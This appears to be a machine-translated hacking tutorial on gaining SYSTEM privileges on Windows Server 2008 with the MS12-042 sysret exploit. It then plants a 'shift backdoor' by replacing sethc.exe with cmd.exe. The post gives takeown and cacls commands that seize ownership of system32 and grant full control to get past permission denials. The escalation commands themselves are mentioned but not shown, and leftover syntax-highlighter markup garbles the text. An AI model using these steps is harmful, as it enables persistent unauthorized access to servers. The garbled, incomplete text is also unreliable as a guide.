As we all know, the system permissions of the 08 privilege are very strict and the overflow tools commonly used in the 2003 system fail. In the face of restricting the IP connection, we get the system permission in time to have the account and not go to this situation can only be a shift back door or magnifier. However, 08 permissions do not operate in system folders.
Check the login account permissions through WhoAmI first. Through what we see is normal permissions
When I use it, MS12042, this is all going to be sysret.exe with a separate story.
We find w3wp.exe this PID and execute the following command.
I'm going to get the right permission.
We see that we've got the system right now.
Next, use the following command to replace the Sethc.exe with CMD in the future and then remote server 5 under shift to bring up cmd
But found a denial of access.
In this case, we need to change all files and folders under the Permissions directory, and the owners under the subfolders to the Administrators group (administrators) command
<textarea class= "Crayon-plain print-no" readonly data-settings= "DblClick" >takeown/f c:\windows\system32\*.*/a/r /d y </textarea>
1 |
< Span class= "crayon-v" >takeown /f c:\ Windows\system32\ *. * /a Span class= "Crayon-o" >/r / d y |
Then in the execution
<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">cacls c:\windows\system32\*.*/t/e/g administrators:f</textarea>
1 |
< Span class= "crayon-i" >cacls c:< Span class= "Crayon-sy" >\windows\system32< Span class= "Crayon-sy" >\*. * /t Span class= "Crayon-o" >/e / g administrators:< Span class= "crayon-v" >f |
NTFS permissions for files and subfolders in the directory are modified to only the Administrators group (administrators) Full Control
Then System folder permissions
Then you can replace SETHC.
However, only the Administrators group can execute permissions, but we only have the system permissions system permissions still not operating system folders
We will order the
<textarea class="crayon-plain print-no" readonly="" data-settings="dblclick">cacls c:\windows\system32\*.*/t/e/g system:f</textarea>
1 |
< Span class= "crayon-i" >cacls c:< Span class= "Crayon-sy" >\windows\system32< Span class= "Crayon-sy" >\*. * /t Span class= "Crayon-o" >/e / g system:f |
Now we've successfully installed the shift back door.
2008 Right to Breakthrough system permissions install shift back door